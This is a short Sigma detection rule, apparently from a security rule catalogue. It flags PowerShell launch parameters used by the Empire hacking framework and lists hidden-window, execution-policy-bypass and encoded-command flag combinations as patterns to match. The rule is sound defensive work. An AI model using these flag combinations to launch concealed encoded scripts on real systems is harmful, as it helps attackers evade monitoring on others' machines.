Techniques
Sample rules
HackTool - Empire PowerShell Launch Parameters
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects suspicious powershell command line parameters used in Empire
Detection logic
condition: selection
selection:
CommandLine|contains:
- ' -NoP -sta -NonI -W Hidden -Enc '
- ' -noP -sta -w 1 -enc '
- ' -NoP -NonI -W Hidden -enc '
- ' -noP -sta -w 1 -enc'
- ' -enc SQB'
- ' -nop -exec bypass -EncodedCommand '